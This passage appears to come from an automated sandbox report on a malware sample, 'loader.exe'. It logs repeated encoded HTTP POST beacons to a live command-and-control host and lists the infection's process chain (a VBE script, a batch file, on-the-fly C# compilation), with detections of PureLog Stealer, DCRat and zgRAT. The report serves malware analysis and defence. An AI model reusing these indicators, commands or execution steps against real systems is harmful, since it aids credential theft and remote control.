                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:46.598686934 CET2544OUTData Raw: 5f 57 59 52 54 43 54 58 5b 5f 5a 51 59 56 58 50 57 51 5d 5a 57 5a 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _WYRTCTX[_ZQYVXPWQ]ZWZSZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S..0'B!>##V">>+(-Z(- <!!(+:;" ,&F$.Y/!
                                                                                  Jan 11, 2025 06:44:46.901236057 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:47.034267902 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:46 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  112192.168.2.65714837.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:47.169780970 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:47.520479918 CET2544OUTData Raw: 5f 50 59 57 54 45 51 59 5b 5f 5a 51 59 52 58 5e 57 50 5d 5f 57 5b 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _PYWTEQY[_ZQYRX^WP]_W[SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.8<5>; 0*).3+6)=;Y704Q<^"09/&F$.Y/1
                                                                                  Jan 11, 2025 06:44:47.797544956 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:47.926518917 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:47 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  113192.168.2.65714937.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:47.964642048 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1852
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  114192.168.2.65715037.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:48.061866999 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:48.410943031 CET2544OUTData Raw: 5f 51 59 53 51 45 54 5a 5b 5f 5a 51 59 54 58 5e 57 5a 5d 5a 57 5c 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _QYSQETZ[_ZQYTX^WZ]ZW\SU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-80'B".+"3:*-(?6?[+[ <?R 1'(77.>&F$.Y/)
                                                                                  Jan 11, 2025 06:44:48.689635992 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:48.818295002 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:48 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  115192.168.2.65715137.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:49.083321095 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:49.442249060 CET2544OUTData Raw: 5a 51 59 52 51 42 54 5f 5b 5f 5a 51 59 54 58 5f 57 5a 5d 58 57 5f 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZQYRQBT_[_ZQYTX_WZ]XW_S\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.^;#C6.$Y"3>>-0_+.?,7#S# P?4V5,.&F$.Y/)
                                                                                  Jan 11, 2025 06:44:49.712140083 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:49.842535973 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:49 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  116192.168.2.65715237.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:49.983584881 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:50.333131075 CET2544OUTData Raw: 5f 54 59 53 54 41 54 51 5b 5f 5a 51 59 5e 58 56 57 5c 5d 5e 57 5a 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _TYSTATQ[_ZQY^XVW\]^WZS^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S._;8![<Y#:).4(=)^+=7[ Z0 W +;Y 35Y/.&F$.Y/
                                                                                  Jan 11, 2025 06:44:50.630279064 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:50.762231112 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:50 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  117192.168.2.65715337.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:50.887586117 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:51.239242077 CET2544OUTData Raw: 5f 54 59 54 51 47 54 5d 5b 5f 5a 51 59 56 58 53 57 5e 5d 5d 57 5e 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _TYTQGT][_ZQYVXSW^]]W^SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-,#5>##3>>=<X>('Y4(70(*< 0!X8>&F$.Y/!
                                                                                  Jan 11, 2025 06:44:51.512744904 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:51.646188021 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  118192.168.2.65715437.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:51.837084055 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:52.192189932 CET2544OUTData Raw: 5a 55 59 54 54 40 54 5d 5b 5f 5a 51 59 51 58 57 57 5d 5d 59 57 50 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZUYTT@T][_ZQYQXWW]]YWPSU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.],">47![=>+>.>).<"?/R#1(S*)']7 >;&F$.Y/=
                                                                                  Jan 11, 2025 06:44:52.468055964 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:52.701010942 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:52 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[
                                                                                  Jan 11, 2025 06:44:52.701045990 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:52 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  119192.168.2.65715537.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:52.840137005 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  120192.168.2.65715637.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:53.076770067 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:53.426698923 CET1872OUTData Raw: 5f 57 59 52 54 41 51 5e 5b 5f 5a 51 59 5f 58 52 57 5d 5d 58 57 5d 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _WYRTAQ^[_ZQY_XRW]]XW]SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.8U#B6$]#>=Y+..++4<7P $?3_# %/&F$.Y/
                                                                                  Jan 11, 2025 06:44:53.714298010 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:53.848280907 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 25 0a 29 1b 36 10 26 2b 2b 0b 25 23 25 0e 3e 04 34 02 2a 03 03 5c 24 38 0f 5d 27 3e 27 0e 27 28 32 04 3f 07 2e 19 26 3c 38 03 2e 34 2b 5d 0c 13 22 5f 37 39 25 01 26 3f 3f 05 2b 28 24 06 21 05 3d 05 29 29 36 0c 3f 11 33 03 3c 39 2f 59 2b 14 26 1e 2f 06 26 05 3a 20 04 1d 20 3e 2b 52 0d 11 24 54 3f 3d 22 0c 3e 07 37 5f 21 28 28 00 30 13 07 0c 32 31 39 0f 27 07 3f 01 31 32 36 09 30 31 2d 54 26 05 2a 1c 32 3c 25 50 22 22 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: %)6&++%#%>4*\$8]'>''(2?.&<8.4+]"_79%&??+($!=))6?3<9/Y+&/&: >+R$T?=">7_!((0219'?12601-T&*2<%P""#T,"W3UV


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  121192.168.2.65715737.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:53.196543932 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:53.552054882 CET2544OUTData Raw: 5f 57 59 54 54 46 51 5d 5b 5f 5a 51 59 52 58 57 57 5a 5d 5c 57 59 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _WYTTFQ][_ZQYRXWWZ]\WYST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/(#> 4%+=$<=*<-#/471$W?:?73&,.&F$.Y/1
                                                                                  Jan 11, 2025 06:44:53.835568905 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:53.964438915 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  122192.168.2.65715837.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:54.087282896 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:54.735246897 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:45:05.548161030 CET2544OUTData Raw: 5f 53 59 57 51 47 54 58 5b 5f 5a 51 59 5e 58 5e 57 58 5d 5e 57 5f 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _SYWQGTX[_ZQY^X^WX]^W_S\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/#;C"-4><Y(X:(.'#,?R4++( !Y/&F$.Y/
                                                                                  Jan 11, 2025 06:45:05.812400103 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:45:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:00:42:46
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Users\user\Desktop\loader.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\loader.exe"
                                                                                  Imagebase:0x630000
                                                                                  File size:3'314'471 bytes
                                                                                  MD5 hash:2307CA04C2633D28345FB0580C77C2EC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Borland Delphi
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2162490833.0000000005BE3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2161189771.0000000007387000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:00:42:48
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe"
                                                                                  Imagebase:0x70000
                                                                                  File size:147'456 bytes
                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:00:42:59
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\ServerWinRuntimeBroker\wJc3A8cK4hSMmtCgCMOA49.bat" "
                                                                                  Imagebase:0x1c0000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:00:42:59
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff66e660000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:00:42:59
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\ServerWinRuntimeBroker/chainPorthostCommon.exe"
                                                                                  Imagebase:0x4b0000
                                                                                  File size:1'960'448 bytes
                                                                                  MD5 hash:CF5B49706562BA2047CDA4A451DD573A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2286038382.00000000004B2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2357344463.0000000012B88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:00:43:03
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline"
                                                                                  Imagebase:0x7ff7bbe90000
                                                                                  File size:2'759'232 bytes
                                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:00:43:04
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff66e660000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:9
                                                                                  Start time:00:43:04
                                                                                  Start date:11/01/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF2D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E4D641D33A148FC98C6B9EA6A6669B1.TMP"
                                                                                  Imagebase:0x7ff7f4b50000
                                                                                  File size:52'744 bytes
                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
